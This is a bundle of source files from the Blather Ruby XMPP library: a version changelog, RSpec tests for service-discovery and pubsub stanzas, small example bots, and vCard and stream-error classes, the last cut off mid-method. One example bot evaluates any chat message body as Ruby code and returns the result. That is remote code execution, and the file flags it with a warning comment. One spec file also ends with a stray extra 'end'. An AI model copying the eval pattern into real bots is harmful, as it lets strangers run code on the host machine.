# [v0.7.1](https://github.com/adhearsion/blather/compare/v0.7.0...v0.7.1) - [2012-04-29](https://rubygems.org/gems/blather/versions/0.7.1)
* Documentation updates
* Bugfix(benlangfeld): Relax Nokogiri dependency to allow 1.5
* Bugfix(benlangfeld): Fix some nokogiri 1.5 related bugs on JRuby (some remain)
* Bugfix(benlangfeld): Set namespaces correctly on some tricky nodes
* Bugfix(benlangfeld): Ensure all presence sub-types trigger the correct handlers
# [v0.7.0](https://github.com/adhearsion/blather/compare/v0.6.2...v0.7.0) - [2012-03-15](https://rubygems.org/gems/blather/versions/0.7.0)
* Change(benlangfeld): Drop Ruby 1.8.7 compatibility
* Change(bklang): Remove the wire log, which duplicated the parsed logging
* Feature(benlangfeld): Stanza handlers are now executed outside of the EM reactor, so it is not blocked on stanza processing
* Bugfix(benlangfeld): MUC user presence and messages now have separate handler names
* Feature(benlangfeld): Stanzas may now be imported from a string using `XMPPNode.parse`
* Bugfix(benlangfeld): All `Blather::Stanza::Presence::C` attributes are now accessible on importing
* Bugfix(benlangfeld): Presence stanzas are now composed on import, including all children
* Bugfix(mtrudel): JIDs in roster item stanzas are now stripped of resources
# [v0.6.2](https://github.com/adhearsion/blather/compare/v0.6.1...v0.6.2) - [2012-02-28](https://rubygems.org/gems/blather/versions/0.6.2)
* Feature(benlangfeld): Add password support to `MUCUser`
* Feature(benlangfeld): Add support for invitation elements to `MUCUser` messages
* Feature(benlangfeld): Add support for MUC invite declines
* Bugfix(benlangfeld): Don't implicitly create an invite node when checking invite status
* Bugfix(benlangfeld): Ensure that form nodes are not duplicated on muc/muc_user presence stanzas
# [v0.6.1](https://github.com/adhearsion/blather/compare/v0.6.0...v0.6.1) - [2012-02-25](https://rubygems.org/gems/blather/versions/0.6.1)
* Bugfix(benlangfeld): Ensure MUC presence nodes (joining) have a form element on creation
# [v0.6.0](https://github.com/adhearsion/blather/compare/v0.5.12...v0.6.0) - [2012-02-24](https://rubygems.org/gems/blather/versions/0.6.0)
* Feature(benlangfeld): Very basic MUC and delayed message support
* Bugfix(theozaurus): Disable connection timeout timer if client deliberately disconnects
* Bugfix(mtrudel): Fix `Roster#each` to return roster_items as per documentation
# [v0.5.12](https://github.com/adhearsion/blather/compare/v0.5.11...v0.5.12) - [2012-01-06](https://rubygems.org/gems/blather/versions/0.5.12)
* Bugfix(benlangfeld): Allow specifying the connection timeout in DSL setup
# [v0.5.11](https://github.com/adhearsion/blather/compare/v0.5.10...v0.5.11) - [2012-01-06](https://rubygems.org/gems/blather/versions/0.5.11)
* Feature(benlangfeld): Allow specifying a connection timeout
* Raise `Blather::Stream::ConnectionTimeout` if timeout is exceeded
* Default to 180 seconds
# [v0.5.10](https://github.com/adhearsion/blather/compare/v0.5.9...v0.5.10) - [2011-12-02](https://rubygems.org/gems/blather/versions/0.5.10)
* Feature(juandebravo): Allow configuring the wire log level
* Bugfix(benlangfeld): Checking connection status before the stream is established
# [v0.5.9](https://github.com/adhearsion/blather/compare/v0.5.8...v0.5.9) - [2011-11-24](https://rubygems.org/gems/blather/versions/0.5.9)
* Bugfix(benlangfeld): Failed connections now raise a Blather::Stream::ConnectionFailed exception
* Bugfix(crohr): Blather now supports EventMachine 1.0
# v0.5.8
* Bugfix(benlangfeld): JIDs now maintain case, but still compare case insensitively
* Bugfix(jmazzi): Development dependencies now resolve correctly on JRuby and Rubinius
# v0.5.7
* Bugfix(benlangfeld): Don't install BlueCloth as a development dependency when on JRuby
# v0.5.6
* Changes from 0.5.5, this time without a bug when using the namespaced DSL approach
# v0.5.5 (yanked)
* Bugfix(benlangfeld/kibs): ActiveSupport was overriding the presence DSL method
* Feature(fyafighter): Adds SSL peer verification to TLS
# v0.5.4
* Bugfix(fyafighter): Regression related to earlier refactoring: https://github.com/sprsquish/blather/issues/53
* Feature(fyafighter): Make it much easier to allow private network addresses
* Bugfix(benlangfeld): Fix the Nokogiri dependency to the 1.4.x series, due to a bug in 1.5.x
* Bugfix(zlu): Replace class_inheritable_attribute with class_attribute because it is deprecated in ActiveSupport 3.1
# v0.5.3
* Feature(benlangfeld): Add XMPP Ping (XEP-0199) support
# v0.5.2
* Bugfix(benlangfeld): Remove specs for the Nokogiri extensions which were moved out
# v0.5.1 - yanked
* Feature(benlangfeld): Abstract out Nokogiri extensions and helpers into new Niceogiri gem for better sharing
* Documentation(benlangfeld)
# v0.5.0
* Feature(radsaq): Add a #connected? method on Blather::Client
* Feature(benlangfeld)[API change]: Allow the removal of child nodes from an IQ reply
* Bugfix(zlu): Use rubygems properly in examples
* Bugfix(benlangfeld): Remove code borrowed from ActiveSupport and instead depend on it to avoid version conflicts
* Documentation(sprsquish)
# v0.4.16
* Feature(benlangfeld): switch from jeweler to bundler
* Feature(benlangfeld): add cap support (XEP-0115)
* Bugfix(sprsquish): Better equality checking
* Bugfix(sprsquish): Fix #to_proc
* Bugfix(mironov): Skip private IPs by default
# v0.4.15
* Feature(mironov): Implement XEP-0054: vcard-temp
* Feature(benlangfeld): Basic support for PubSub subscription notifications as PubSub events
* Feature(mironov): Ability to clear handlers
* Feature(mironov): Implement incoming file transfers (XEP-0096, XEP-0065, XEP-0047)
* Bugfix(mironov): Fix for importing messages with chat states
* Bugfix(mironov): Added Symbol#to_proc method to work on ruby 1.8.6
* Bugfix(mironov): Fix roster items .status method to return highest priority presence
* Bugfix(mironov): Remove old unavailable presences while adding new one
* Bugfix(mironov): Use Nokogiri::XML::ParseOptions::NOENT to prevent double-encoding of entities
* Bugfix(benlangfeld): Disco Info Identities should have an xml:lang attribute
* Bugfix(mironov): Fix lookup path for ruby 1.9
* Bugfix(mironov): stanza_error.to_node must set type of the error
* Bugfix(mironov): Allow message to have iq child
* Bugfix(mironov): Find xhtml body in messages sent from iChat 5.0.3
# v0.4.14
* Tests: get specs fully passing on rubinius
* Feature(mironov): Implement XEP-0085 Chat State Notifications
* Bugfix(mironov): send stanzas unformatted
* Bugfix(mironov): Message#xhtml uses inner_html so tags aren't escaped
* Bugfix(mironov): Message#xhtml= now works with multiple root nodes
# v0.4.13
* Bugfix: Place form child of command inside command element
# v0.4.12
* API Change: Switch order of var and type arguments to X::Field.new since var is always required but type is not
* API Change: PubSub payloads can be strings or nodes and can be set nil. PubSub#payload will always return a string
* Feature: Add forms to Message stanzas
# v0.4.11
* Bugfix: command nodes were generating the wrong xml
* Bugfix: x nodes were generating the wrong xml
* Feature: ability to set identities and features on disco info nodes
* Feature: ability to set items on disco item nodes
# v0.4.10
* no change
# v0.4.9
* Feature: XEP-0004 x:data (benlangfeld)
* Feature: XEP-0050 Ad-Hoc commands (benlangfeld)
* Minor bugfixes for the specs
# v0.4.8
* Feature: add xhtml getter/setter to Message stanza
* Bugfix: heirarchy -> hierarchy spelling mistake
* Hella documentation
# v0.4.7
* Update to work with Nokogiri 1.4.0
# v0.4.6
* Bugfix: prioritize authentication mechanisms
# v0.4.5
* Bugfix: Change DSL#write to DSL#write_to_stream. Previous way was messing with YAML
# v0.4.4
* Add "disconnected" handler type to handle connection termination
* Bugfix: Fix error with pubsub using the wrong client connection
# v0.4.3
* Bugfix: status stanza with a blank state will be considered :available (GH-23)
* Bugfix: ensure regexp guards try to match against a string (GH-24)
* Stream creation is now evented. The stream object will be sent to #post_init
* Parser debugging disabled by default
* Update parser to work with Nokogiri 1.3.2
* Bugfix: discover helper now calls the correct method on client
* Bugfix: ensure XMPPNode#inherit properly sets namespaces on inherited nodes
* Bugfix: xpath guards with namespaces work properly (GH-25)
# v0.4.2
* Fix -D option to actually put Blather in debug mode
* Stanzas over a client connection will either have the full JID or no JID
* Regexp guards can be anything that implements #last_match (Regexp or Oniguruma)
* Add "halt" and "pass" to allow handlers to either halt the handler chain or pass to the next handler
* Fix default status handler so it doesn't eat the stanza
* Add before and after filters. Filters, like handlers, can have guards.
# v0.4.1
* Bugfix in roster: trying to call the wrong method on client
# v0.4.0
* Switch from LibXML-Ruby to Nokogiri
* Update test suite to run on Ruby 1.9
* Add "<<" style writer to the DSL to provide for chaining outbound writes
* SRV lookup support
* Add XPath type of handler guard
* PubSub support
# v0.3.4
* Remove unneeded functions from the push parser.
* Create a ParseWarning error that doesn't kill the stream.
* When a parse error comes in the reply should let the other side know it screwed up before dying.
* Add the LibXML::XML::Error node to the ParseError/ParseWarning objects.
# v0.3.3
* Fix the load error related to not pushing Blather's dir into the load path
# v0.3.2
* Switch the push parser from chunking to streaming.
* Don't push Blather's dir into the load paths
# v0.3.1
* Small changes to the DSL due to handler collisions:
"status" -> "set_status"
"roster" -> "my_roster"
* Small changes to the Blather::Client API to keep it feeling more like EM's API:
#stream_started -> #post_init
#call -> #receive_data
#stop -> #close
#stopped -> #unbind
* Refactored some of the code internal to Blather::Client
* Added command line option handler to default use method (see README)
* require libxml-ruby >=1.1.2 (1.1.3 has an inconsistent malloc err on OS X 10.5)
* complete specs
* add single process ping-pong example
# v0.3.0
* Remove autotest discover.rb (created all sorts of conflicts)
* Added Hash with Array guard
* Added a hierarchy printer to examples directory
* Moved Disco to be in the Stanza namespace (staves off deeply namespaced classes)
* Namespaced the DSL methods to Blather::DSL. These can be included in any object you like now. "require 'blather/client'" will still include them directly in Kernel to keep the simple one-file dsl
* Stopped doing one class per error type. This created a giant hierarchy tree that was just unnecessary. The error name is now #name. Errors can be matched with a combination of handler and guard.
* Fixed XML namespaces. Previous versions weren't actually adding the node to the namespace making xpath queries inconsistent at best.
* Added support for anonymous authentication by providing a blank node on the jid ("@[host]")
# v0.2.3
* Go back to using the master branch for gems (stupid mistake)
# v0.2.2
* Switch to Jeweler.
* Move from custom libxml to just a custom push parser
* Add guards to handlers
# v0.2.1 Upgrade to libxml 0.9.7
# v0.2 Overhaul the DSL to look more like Sinatra
# v0.1 Initial release (birth!)
<file_sep>/spec/blather/stanza/discos/disco_items_spec.rb
require 'spec_helper'
# Fixture: a disco#items result stanza (XEP-0030 Service Discovery)
# advertising three item nodes from catalog.shakespeare.lit. Used by the
# import/inherit examples below.
def disco_items_xml
  <<-XML
  <iq type='result'
      from='catalog.shakespeare.lit'
      to='<EMAIL>/orchard'
      id='items2'>
    <query xmlns='http://jabber.org/protocol/disco#items'>
      <item jid='catalog.shakespeare.lit'
            node='books'
            name='Books by and about Shakespeare'/>
      <item jid='catalog.shakespeare.lit'
            node='clothing'
            name='Wear your literary taste with pride'/>
      <item jid='catalog.shakespeare.lit'
            node='music'
            name='Music from the time of Shakespeare'/>
    </query>
  </iq>
  XML
end
describe Blather::Stanza::Iq::DiscoItems do
  # Parsing a disco#items <query/> must yield this class, not a generic Iq.
  it 'registers itself' do
    expect(Blather::XMPPNode.class_from_registration(:query, 'http://jabber.org/protocol/disco#items')).to eq(Blather::Stanza::Iq::DiscoItems)
  end

  it 'must be importable' do
    expect(Blather::XMPPNode.parse(disco_items_xml)).to be_instance_of Blather::Stanza::Iq::DiscoItems
  end

  it 'is constructed properly' do
    n = Blather::Stanza::Iq::DiscoItems.new :get, '/path/to/node'
    n.to = '<EMAIL>'
    # The query element must carry the node attribute and live in the
    # disco#items namespace.
    expect(n.find("/iq[@to='<EMAIL>' and @type='get' and @id='#{n.id}']/ns:query[@node='/path/to/node']", :ns => Blather::Stanza::Iq::DiscoItems.registered_ns)).not_to be_empty
  end

  it 'has a node attribute' do
    n = Blather::Stanza::Iq::DiscoItems.new nil, 'music', []
    expect(n.node).to eq('music')
    # The writer stringifies whatever it is given
    n.node = :foo
    expect(n.node).to eq('foo')
  end

  it 'inherits a list of identities' do
    n = parse_stanza disco_items_xml
    r = Blather::Stanza::Iq::DiscoItems.new.inherit n.root
    expect(r.items.size).to eq(3)
    expect(r.items.map { |i| i.class }.uniq).to eq([Blather::Stanza::Iq::DiscoItems::Item])
  end

  # The items writer accepts hashes, Item objects, a single value, or any
  # mix, normalising everything to DiscoItems::Item children.
  it 'takes a list of hashes for items' do
    items = [
      {:jid => 'foo@bar/baz', :node => 'node', :name => 'name'},
      {:jid => 'baz@foo/bar', :node => 'node1', :name => 'name1'},
    ]
    control = [ Blather::Stanza::Iq::DiscoItems::Item.new(*%w[foo@bar/baz node name]),
                Blather::Stanza::Iq::DiscoItems::Item.new(*%w[baz@foo/bar node1 name1])]
    di = Blather::Stanza::Iq::DiscoItems.new nil, nil, items
    expect(di.items.size).to eq(2)
    di.items.each { |i| expect(control.include?(i)).to eq(true) }
  end

  it 'takes a list of Item objects as items' do
    control = [ Blather::Stanza::Iq::DiscoItems::Item.new(*%w[foo@bar/baz node name]),
                Blather::Stanza::Iq::DiscoItems::Item.new(*%w[baz@foo/bar node1 name1])]
    di = Blather::Stanza::Iq::DiscoItems.new nil, nil, control
    expect(di.items.size).to eq(2)
    di.items.each { |i| expect(control.include?(i)).to eq(true) }
  end

  it 'takes a single hash as identity' do
    control = [Blather::Stanza::Iq::DiscoItems::Item.new(*%w[foo@bar/baz node name])]
    di = Blather::Stanza::Iq::DiscoItems.new nil, nil, {:jid => 'foo@bar/baz', :node => 'node', :name => 'name'}
    expect(di.items.size).to eq(1)
    di.items.each { |i| expect(control.include?(i)).to eq(true) }
  end

  it 'takes a single identity object as identity' do
    control = [Blather::Stanza::Iq::DiscoItems::Item.new(*%w[foo@bar/baz node name])]
    di = Blather::Stanza::Iq::DiscoItems.new nil, nil, control.first
    expect(di.items.size).to eq(1)
    di.items.each { |i| expect(control.include?(i)).to eq(true) }
  end

  it 'takes a mix of hashes and identity objects as items' do
    items = [
      {:jid => 'foo@bar/baz', :node => 'node', :name => 'name'},
      Blather::Stanza::Iq::DiscoItems::Item.new(*%w[baz@foo/bar node1 name1]),
    ]
    control = [ Blather::Stanza::Iq::DiscoItems::Item.new(*%w[foo@bar/baz node name]),
                Blather::Stanza::Iq::DiscoItems::Item.new(*%w[baz@foo/bar node1 name1])]
    di = Blather::Stanza::Iq::DiscoItems.new nil, nil, items
    expect(di.items.size).to eq(2)
    di.items.each { |i| expect(control.include?(i)).to eq(true) }
  end

  # items supports append (+=) and reset; assigning nil clears the list.
  it 'allows adding of items' do
    di = Blather::Stanza::Iq::DiscoItems.new
    expect(di.items.size).to eq(0)
    di.items = [{:jid => 'foo@bar/baz', :node => 'node', :name => 'name'}]
    expect(di.items.size).to eq(1)
    di.items += [Blather::Stanza::Iq::DiscoItems::Item.new(*%w[foo@bar/baz node name])]
    expect(di.items.size).to eq(2)
    di.items = nil
    expect(di.items.size).to eq(0)
  end
end
describe Blather::Stanza::Iq::DiscoItems::Item do
  # Passing an XML node to .new should copy jid/node/name from it.
  it 'will auto-inherit nodes' do
    n = parse_stanza "<item jid='foo@bar/baz' node='music' name='Music from the time of Shakespeare' />"
    i = Blather::Stanza::Iq::DiscoItems::Item.new n.root
    expect(i.jid).to eq(Blather::JID.new('foo@bar/baz'))
    expect(i.node).to eq('music')
    expect(i.name).to eq('Music from the time of Shakespeare')
  end

  it 'has a jid attribute' do
    n = Blather::Stanza::Iq::DiscoItems::Item.new 'foo@bar/baz'
    expect(n.jid).to be_kind_of Blather::JID
    expect(n.jid).to eq(Blather::JID.new('foo@bar/baz'))
    n.jid = 'baz@foo/bar'
    expect(n.jid).to eq(Blather::JID.new('baz@foo/bar'))
  end

  it 'has a node attribute' do
    n = Blather::Stanza::Iq::DiscoItems::Item.new 'foo@bar/baz', 'music'
    expect(n.node).to eq('music')
    n.node = 'book'
    expect(n.node).to eq('book')
  end

  it 'has a name attribute' do
    n = Blather::Stanza::Iq::DiscoItems::Item.new 'foo@bar/baz', nil, 'Music from the time of Shakespeare'
    expect(n.name).to eq('Music from the time of Shakespeare')
    n.name = 'Books by and about Shakespeare'
    expect(n.name).to eq('Books by and about Shakespeare')
  end

  it 'can determine equality' do
    a = Blather::Stanza::Iq::DiscoItems::Item.new('foo@bar/baz')
    expect(a).to eq(Blather::Stanza::Iq::DiscoItems::Item.new('foo@bar/baz'))
    # Use the value-equality matcher (eq) rather than the identity matcher
    # (equal): two separately constructed Items are never the same object,
    # so `not_to equal` passed vacuously and never exercised Item#==.
    expect(a).not_to eq(Blather::Stanza::Iq::DiscoItems::Item.new('not-foo@bar/baz'))
  end
end
end
<file_sep>/spec/blather/stanza/pubsub/subscription_spec.rb
require 'spec_helper'
require 'fixtures/pubsub'
describe Blather::Stanza::PubSub::Subscription do
  # Parsing a pubsub <subscription/> must yield this class.
  it 'registers itself' do
    expect(Blather::XMPPNode.class_from_registration(:subscription, 'http://jabber.org/protocol/pubsub')).to eq(Blather::Stanza::PubSub::Subscription)
  end

  it 'can be imported' do
    expect(Blather::XMPPNode.parse(subscription_xml)).to be_instance_of Blather::Stanza::PubSub::Subscription
  end

  it 'ensures an subscription node is present on create' do
    subscription = Blather::Stanza::PubSub::Subscription.new :set, 'host', 'node', 'jid', 'subid', :none
    expect(subscription.find('//ns:pubsub/ns:subscription', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
  end

  # Removing the child and calling the accessor must lazily re-create it.
  it 'ensures an subscription node exists when calling #subscription_node' do
    subscription = Blather::Stanza::PubSub::Subscription.new :set, 'host', 'node', 'jid', 'subid', :none
    subscription.pubsub.remove_children :subscription
    expect(subscription.find('//ns:pubsub/ns:subscription', :ns => Blather::Stanza::PubSub.registered_ns)).to be_empty
    expect(subscription.subscription_node).not_to be_nil
    expect(subscription.find('//ns:pubsub/ns:subscription', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
  end

  it 'defaults to a set node' do
    subscription = Blather::Stanza::PubSub::Subscription.new :set, 'host', 'node', 'jid', 'subid', :none
    expect(subscription.type).to eq(:set)
  end

  it 'sets the host if requested' do
    subscription = Blather::Stanza::PubSub::Subscription.new :set, 'pubsub.jabber.local', 'node', 'jid', 'subid', :none
    expect(subscription.to).to eq(Blather::JID.new('pubsub.jabber.local'))
  end

  it 'sets the node' do
    subscription = Blather::Stanza::PubSub::Subscription.new :set, 'host', 'node-name', 'jid', 'subid', :none
    expect(subscription.node).to eq('node-name')
  end

  # Each attribute below is checked both through the accessor and in the
  # generated XML, for read and write.
  it 'has a node attribute' do
    subscription = Blather::Stanza::PubSub::Subscription.new :set, 'host', 'node-name', 'jid', 'subid', :none
    expect(subscription.find('//ns:pubsub/ns:subscription[@node="node-name"]', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
    expect(subscription.node).to eq('node-name')
    subscription.node = 'new-node'
    expect(subscription.find('//ns:pubsub/ns:subscription[@node="new-node"]', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
    expect(subscription.node).to eq('new-node')
  end

  it 'has a jid attribute' do
    subscription = Blather::Stanza::PubSub::Subscription.new :set, 'host', 'node-name', 'jid', 'subid', :none
    expect(subscription.find('//ns:pubsub/ns:subscription[@jid="jid"]', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
    expect(subscription.jid).to eq(Blather::JID.new('jid'))
    subscription.jid = Blather::JID.new('n@d/r')
    expect(subscription.find('//ns:pubsub/ns:subscription[@jid="n@d/r"]', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
    expect(subscription.jid).to eq(Blather::JID.new('n@d/r'))
  end

  it 'has a subid attribute' do
    subscription = Blather::Stanza::PubSub::Subscription.new :set, 'host', 'node-name', 'jid', 'subid', :none
    expect(subscription.find('//ns:pubsub/ns:subscription[@subid="subid"]', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
    expect(subscription.subid).to eq('subid')
    subscription.subid = 'new-subid'
    expect(subscription.find('//ns:pubsub/ns:subscription[@subid="new-subid"]', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
    expect(subscription.subid).to eq('new-subid')
  end

  it 'has a subscription attribute' do
    subscription = Blather::Stanza::PubSub::Subscription.new :set, 'host', 'node-name', 'jid', 'subid', :none
    expect(subscription.find('//ns:pubsub/ns:subscription[@subscription="none"]', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
    expect(subscription.subscription).to eq(:none)
    subscription.subscription = :pending
    expect(subscription.find('//ns:pubsub/ns:subscription[@subscription="pending"]', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
    expect(subscription.subscription).to eq(:pending)
  end

  # Invalid subscription states must raise; every valid state must be accepted.
  it 'ensures subscription is one of Stanza::PubSub::Subscription::VALID_TYPES' do
    expect { Blather::Stanza::PubSub::Subscription.new :set, 'host', 'node-name', 'jid', 'subid', :invalid_type_name }.to raise_error(Blather::ArgumentError)
    Blather::Stanza::PubSub::Subscription::VALID_TYPES.each do |valid_type|
      n = Blather::Stanza::PubSub::Subscription.new :set, 'host', 'node-name', 'jid', 'subid', valid_type
      expect(n.subscription).to eq(valid_type)
    end
  end

  # e.g. #none?, #pending?, #subscribed? predicates, one per valid state
  Blather::Stanza::PubSub::Subscription::VALID_TYPES.each do |valid_type|
    it "provides a helper (#{valid_type}?) for type #{valid_type}" do
      expect(Blather::Stanza::PubSub::Subscription.new).to respond_to :"#{valid_type}?"
    end
  end
end
<file_sep>/examples/execute.rb
#!/usr/bin/env ruby
require 'rubygems'
require 'blather/client'
# Shut the bot down when any chat partner sends the literal body "exit".
message :chat?, :body => 'exit' do |m|
  say m.from, 'Exiting ...'
  shutdown
end

# Evaluate any other chat body as Ruby and reply with the result; errors
# are reported back to the sender instead of crashing the bot.
#
# SECURITY WARNING: eval'ing untrusted input from the wire is remote code
# execution by design. This example is for demonstration only — never run
# it with an account that strangers can message.
message :chat?, :body do |m|
  begin
    say m.from, eval(m.body)
  rescue => e
    say m.from, e.inspect
  end
end
<file_sep>/spec/blather/stanza/pubsub/subscribe_spec.rb
require 'spec_helper'
require 'fixtures/pubsub'
describe Blather::Stanza::PubSub::Subscribe do
  # Parsing a pubsub <subscribe/> must yield this class.
  it 'registers itself' do
    expect(Blather::XMPPNode.class_from_registration(:subscribe, 'http://jabber.org/protocol/pubsub')).to eq(Blather::Stanza::PubSub::Subscribe)
  end

  it 'can be imported' do
    expect(Blather::XMPPNode.parse(subscribe_xml)).to be_instance_of Blather::Stanza::PubSub::Subscribe
  end

  it 'ensures an subscribe node is present on create' do
    subscribe = Blather::Stanza::PubSub::Subscribe.new :set, 'host', 'node', 'jid'
    expect(subscribe.find('//ns:pubsub/ns:subscribe', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
  end

  # Removing the child and calling the accessor must lazily re-create it.
  it 'ensures an subscribe node exists when calling #subscribe' do
    subscribe = Blather::Stanza::PubSub::Subscribe.new :set, 'host', 'node', 'jid'
    subscribe.pubsub.remove_children :subscribe
    expect(subscribe.find('//ns:pubsub/ns:subscribe', :ns => Blather::Stanza::PubSub.registered_ns)).to be_empty
    expect(subscribe.subscribe).not_to be_nil
    expect(subscribe.find('//ns:pubsub/ns:subscribe', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
  end

  it 'defaults to a set node' do
    subscribe = Blather::Stanza::PubSub::Subscribe.new :set, 'host', 'node', 'jid'
    expect(subscribe.type).to eq(:set)
  end

  it 'sets the host if requested' do
    subscribe = Blather::Stanza::PubSub::Subscribe.new :set, 'pubsub.jabber.local', 'node', 'jid'
    expect(subscribe.to).to eq(Blather::JID.new('pubsub.jabber.local'))
  end

  it 'sets the node' do
    subscribe = Blather::Stanza::PubSub::Subscribe.new :set, 'host', 'node-name', 'jid'
    expect(subscribe.node).to eq('node-name')
  end

  # Attributes are verified both via accessors and in the generated XML.
  it 'has a node attribute' do
    subscribe = Blather::Stanza::PubSub::Subscribe.new :set, 'host', 'node-name', 'jid'
    expect(subscribe.find('//ns:pubsub/ns:subscribe[@node="node-name"]', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
    expect(subscribe.node).to eq('node-name')
    subscribe.node = 'new-node'
    expect(subscribe.find('//ns:pubsub/ns:subscribe[@node="new-node"]', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
    expect(subscribe.node).to eq('new-node')
  end

  it 'has a jid attribute' do
    subscribe = Blather::Stanza::PubSub::Subscribe.new :set, 'host', 'node-name', 'jid'
    expect(subscribe.find('//ns:pubsub/ns:subscribe[@jid="jid"]', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
    expect(subscribe.jid).to eq(Blather::JID.new('jid'))
    subscribe.jid = Blather::JID.new('n@d/r')
    expect(subscribe.find('//ns:pubsub/ns:subscribe[@jid="n@d/r"]', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
    expect(subscribe.jid).to eq(Blather::JID.new('n@d/r'))
  end
end
<file_sep>/examples/rosterprint.rb
#!/usr/bin/env ruby
# Prints out each roster entry
require 'rubygems'
require 'blather/client'
# Once connected, print every roster entry grouped by roster group
# (ungrouped entries fall under an "Ungrouped" heading), then exit.
when_ready do
  my_roster.grouped.each do |group, members|
    # Section header, e.g. "*** Friends ***"
    puts "#{'*'*3} #{group || 'Ungrouped'} #{'*'*3}"
    members.each do |member|
      puts "- #{member.name} (#{member.jid})"
    end
    puts
  end
  shutdown
end
<file_sep>/lib/blather/stanza/iq/vcard.rb
module Blather
  class Stanza
    class Iq

      # # Vcard Stanza
      #
      # [XEP-0054 vcard-temp](http://xmpp.org/extensions/xep-0054.html)
      #
      # This is a base class for any vcard based Iq stanzas. It provides a base set
      # of methods for working with vcard stanzas
      #
      # @example Retrieving One's vCard
      #     iq = Blather::Stanza::Iq::Vcard.new :get
      #     client.write_with_handler iq do |response|
      #       puts response.vcard
      #     end
      #
      # @example Updating One's vCard
      #     iq = Blather::Stanza::Iq::Vcard.new :set
      #     iq.vcard['NICKNAME'] = 'Romeo'
      #     client.write_with_handler iq do |response|
      #       puts response
      #     end
      #
      # @example Viewing Another User's vCard
      #     iq = Blather::Stanza::Iq::Vcard.new :get, '<EMAIL>'
      #     client.write_with_handler iq do |response|
      #       puts response.vcard
      #     end
      #
      # @handler :vcard
      class Vcard < Iq
        register :vcard, :vCard, 'vcard-temp'

        # Overrides the parent method to ensure a vcard node is created
        #
        # @see Blather::Stanza::Iq.new
        def self.new(type = nil, to = nil, id = nil)
          node = super
          node.vcard # force creation of the <vCard/> child
          node
        end

        # Overrides the parent method to ensure the current vcard node is
        # destroyed before inheriting the new content
        #
        # @see Blather::Stanza::Iq#inherit
        def inherit(node)
          vcard.remove
          super
          self
        end

        # Find or create vcard node
        #
        # @return [Vcard::Vcard]
        def vcard
          Vcard.find_or_create self
        end

        # Replaces vcard node
        #
        # @param [Vcard::Vcard, XML::Node] info the stanza's new vcard node
        #
        # @return [Vcard::Vcard]
        def vcard=(info)
          vcard.remove
          self << info
          Vcard.find_or_create self
        end

        # Vcard stanza fragment
        class Vcard < XMPPNode
          # @private
          VCARD_NS = 'vcard-temp'

          # Create a new Vcard::Vcard object
          #
          # @param [XML::Node, nil] node a node to inherit from
          #
          # @return [Vcard::Vcard]
          def self.new(node = nil)
            new_node = super :vCard
            new_node.namespace = VCARD_NS
            new_node.inherit node if node
            new_node
          end

          # Find or create vCard node in Vcard Iq and converts it to Vcard::Vcard
          #
          # @param [Vcard] parent a Vcard Iq where to find or create vCard
          #
          # @return [Vcard::Vcard]
          def self.find_or_create(parent)
            if found_vcard = parent.find_first('//ns:vCard', :ns => VCARD_NS)
              # re-wrap the existing node so it gains this class' helpers
              vcard = self.new found_vcard
              found_vcard.remove
            else
              vcard = self.new
            end
            parent << vcard
            vcard
          end

          # Find the element's value by name. Nested elements can be
          # addressed with a "/" separated path (e.g. "PHOTO/TYPE").
          #
          # @param [String] name the name of the element
          #
          # @return [String, nil]
          def [](name)
            name = name.split("/").map { |child| "ns:#{child}" }.join("/")
            if elem = find_first(name, :ns => VCARD_NS)
              elem.content
            else
              nil
            end
          end

          # Set the element's value, creating any missing intermediate
          # elements along a "/" separated path
          #
          # @param [String] name the name of the element
          # @param [String, nil] value the new value of element
          #
          # @return [String, nil]
          def []=(name, value)
            elem = nil
            parent = self
            name.split("/").each do |child|
              elem = parent.find_first("ns:#{child}", :ns => VCARD_NS)
              unless elem
                elem = XMPPNode.new(child, parent.document)
                parent << elem
              end
              # descend one level whether the child was found or created
              # (the original duplicated this assignment in an unless/else)
              parent = elem
            end
            elem.content = value
          end
        end
      end
    end
  end
end
<file_sep>/lib/blather/errors/stream_error.rb
module Blather
  # Stream Errors
  # [RFC3920 Section 9.3](http://xmpp.org/rfcs/rfc3920.html#streams-error-rules)
  #
  # @handler :stream_error
  class StreamError < BlatherError
    # @private
    STREAM_ERR_NS = 'urn:ietf:params:xml:ns:xmpp-streams'

    register :stream_error

    attr_reader :text, :extras

    # Factory method for instantiating the proper class for the error
    #
    # @param [Blather::XMPPNode] node the importable node
    def self.import(node)
      name = node.find_first('descendant::*[name()!="text"]', STREAM_ERR_NS).element_name

      text = node.find_first 'descendant::*[name()="text"]', STREAM_ERR_NS
      text = text.content if text

      # everything outside the stream-error namespace is treated as an
      # application-specific extra
      extras = node.find("descendant::*[namespace-uri()!='#{STREAM_ERR_NS}']").map { |n| n }

      self.new name, text, extras
    end

    # Create a new Stream Error
    # [RFC3920 Section 4.7.2](http://xmpp.org/rfcs/rfc3920.html#rfc.section.4.7.2)
    #
    # @param [String] name the error name
    # @param [String, nil] text optional error text
    # @param [Array<Blather::XMPPNode>] extras an array of extras to attach to the
    # error
    def initialize(name, text = nil, extras = [])
      @name = name
      @text = text
      @extras = extras
    end

    # The error name
    #
    # @return [Symbol]
    def name
      @name.gsub('-','_').to_sym
    end

    # Creates an XML node from the error
    #
    # @return [Blather::XMPPNode]
    def to_node
      node = XMPPNode.new('error')
      node.namespace = {'stream' => Blather::Stream::STREAM_NS}

      node << (err = XMPPNode.new(@name, node.document))
      # use the constant instead of repeating the namespace literal
      err.namespace = STREAM_ERR_NS

      if self.text
        node << (text = XMPPNode.new('text', node.document))
        text.namespace = STREAM_ERR_NS
        text.content = self.text
      end

      self.extras.each { |extra| node << extra.dup }
